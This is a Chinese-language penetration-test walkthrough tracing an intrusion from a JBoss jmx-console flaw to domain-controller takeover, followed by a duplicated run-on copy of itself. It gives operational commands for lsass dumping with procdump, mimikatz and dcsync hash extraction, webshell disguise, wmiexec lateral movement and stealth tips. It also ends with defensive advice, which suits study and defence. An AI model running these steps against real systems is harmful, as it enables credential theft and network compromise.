从外围打点到内网渗透拿下域控 - 详细技术教学文档

0x00 前言

本文详细记录了一次从外围打点到内网渗透最终拿下域控的完整过程，涉及Jboss漏洞利用、内网信息收集、权限维持、域环境分析、横向移动以及域控攻陷等技术要点。

0x01 外围打点

Jboss漏洞利用

发现漏洞：
- 使用Jexboss工具扫描Jboss系统
- 发现3个可利用漏洞，包括jmx-console漏洞
获取初始权限：
- 通过jmx-console漏洞直接获取system权限的交互式shell
- 使用whoami确认权限为SYSTEM
权限维持：
- 由于交互式shell不稳定，使用冰蝎(Behinder)进行持久化
- 通过dir命令定位Jboss路径
- 使用echo写入Webshell并连接
- 将webshell伪装为jboss.jsp提高隐蔽性

0x02 本机信息收集

基础信息收集

网络信息：
```
ipconfig /all
netstat -ano
arp -a
```

系统信息：

wmic os get caption,csdversion,osarchitecture,version
systeminfo

软件信息：
```
wmic product get name,version
```

用户与进程：

whoami /user
query user
tasklist /v
net start

敏感信息提取

密码抓取：

确认无杀软后使用procdump导出lsass进程内存

procdump64.exe -accepteula -ma lsass.exe 1.dmp

使用Windows自带压缩工具压缩后下载

makecab c:\jboss\bin\1.dmp 1.zip

本地使用mimikatz离线解析

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

文件分析：
- 在PDF和账单文件中发现内部网站和公司官网
- 使用在线工具扫描子域名

0x03 域内信息收集

基础域信息

域结构：

net view /domain
net view /domain:域名称

域成员：
```
net group "domain computers" /domain
```
域策略：
```
net accounts /domain
```
域信任关系：
```
nltest /domain_trusts
```

用户与权限

用户查询：

net user /domain
wmic user account get /all
dsquery user

特权用户：

net group "domain admins" /domain
net group "Domain Controllers" /domain

域控定位：
- 发现两台域控：DC1(192.168.21.3)和DC2(192.168.21.108)

SPN服务发现

收集SPN记录：
```
setspn -T xxx.com -Q */* > spn.txt
```

处理SPN数据：

grep "CN=" spn.txt | awk -F "," {'print $1'} | awk -F "=" {'print $2'} > host.txt

0x04 内网横向移动

工具选择与问题解决

上传问题：
- 发现无法上传常见渗透工具但可上传图片
- 判断存在文件类型过滤机制
Cobalt Strike使用：
- 使用CS进行内网信息收集和权限维持
- 通过CS派生会话到Metasploit

内网扫描

存活主机探测：
- 使用ARP扫描发现约100多台主机
- 注意防火墙可能导致探测不准确
漏洞扫描：
- 对192.168.21.0/24网段进行MS17-010漏洞扫描
- 发现9台存在漏洞的主机

0x05 域控攻陷

域控访问

使用wmiexec.py：

python3 ./wmiexec.py sxxxx/Administrator:密码@192.168.21.3

哈希提取：
```
lsadump::dcsync /domain:xxx /all /csv
```
- 导出680个用户哈希，表明域规模庞大

安全考虑

避免打草惊蛇：
- 不直接登录远程桌面
- 考虑使用BloodHound进行更深入分析

0x06 技术要点总结

信息收集是关键：
- 全面收集网络、系统、域结构信息
- 及时整理数据(哈希、SPN、用户信息等)
权限维持：
- 使用多种方式维持访问(Webshell、CS等)
- 在多个位置部署后门
域渗透技巧：
- 通过SPN发现服务
- 优先定位和攻击域控
- 使用dcsync提取整个域哈希
隐蔽性考虑：
- 文件伪装
- 避免明显操作(如RDP登录)

0x07 防御建议

Jboss防护：
- 及时更新补丁
- 限制jmx-console访问
域安全：
- 监控异常dcsync操作
- 限制域管理员账户使用
检测与响应：
- 监控lsass进程访问
- 检测异常SPN查询
- 建立哈希提取行为的检测机制
网络分段：
- 实施严格的网络分段
- 限制关键系统(如域控)的网络访问

本案例展示了从外围漏洞利用到完整域环境攻陷的全过程，强调了全面信息收集和有条理的渗透思路的重要性。

从外围打点到内网渗透拿下域控 - 详细技术教学文档 0x00 前言本文详细记录了一次从外围打点到内网渗透最终拿下域控的完整过程，涉及Jboss漏洞利用、内网信息收集、权限维持、域环境分析、横向移动以及域控攻陷等技术要点。 0x01 外围打点 Jboss漏洞利用发现漏洞：使用Jexboss工具扫描Jboss系统发现3个可利用漏洞，包括jmx-console漏洞获取初始权限：通过jmx-console漏洞直接获取system权限的交互式shell 使用 whoami 确认权限为SYSTEM 权限维持：由于交互式shell不稳定，使用冰蝎(Behinder)进行持久化通过 dir 命令定位Jboss路径使用 echo 写入Webshell并连接将webshell伪装为jboss.jsp提高隐蔽性 0x02 本机信息收集基础信息收集网络信息：系统信息：软件信息：用户与进程：敏感信息提取密码抓取：确认无杀软后使用procdump导出lsass进程内存使用Windows自带压缩工具压缩后下载本地使用mimikatz离线解析文件分析：在PDF和账单文件中发现内部网站和公司官网使用在线工具扫描子域名 0x03 域内信息收集基础域信息域结构：域成员：域策略：域信任关系：用户与权限用户查询：特权用户：域控定位：发现两台域控：DC1(192.168.21.3)和DC2(192.168.21.108) SPN服务发现收集SPN记录：处理SPN数据： 0x04 内网横向移动工具选择与问题解决上传问题：发现无法上传常见渗透工具但可上传图片判断存在文件类型过滤机制 Cobalt Strike使用：使用CS进行内网信息收集和权限维持通过CS派生会话到Metasploit 内网扫描存活主机探测：使用ARP扫描发现约100多台主机注意防火墙可能导致探测不准确漏洞扫描：对192.168.21.0/24网段进行MS17-010漏洞扫描发现9台存在漏洞的主机 0x05 域控攻陷域控访问使用wmiexec.py ：哈希提取：导出680个用户哈希，表明域规模庞大安全考虑避免打草惊蛇：不直接登录远程桌面考虑使用BloodHound进行更深入分析 0x06 技术要点总结信息收集是关键：全面收集网络、系统、域结构信息及时整理数据(哈希、SPN、用户信息等) 权限维持：使用多种方式维持访问(Webshell、CS等) 在多个位置部署后门域渗透技巧：通过SPN发现服务优先定位和攻击域控使用dcsync提取整个域哈希隐蔽性考虑：文件伪装避免明显操作(如RDP登录) 0x07 防御建议 Jboss防护：及时更新补丁限制jmx-console访问域安全：监控异常dcsync操作限制域管理员账户使用检测与响应：监控lsass进程访问检测异常SPN查询建立哈希提取行为的检测机制网络分段：实施严格的网络分段限制关键系统(如域控)的网络访问本案例展示了从外围漏洞利用到完整域环境攻陷的全过程，强调了全面信息收集和有条理的渗透思路的重要性。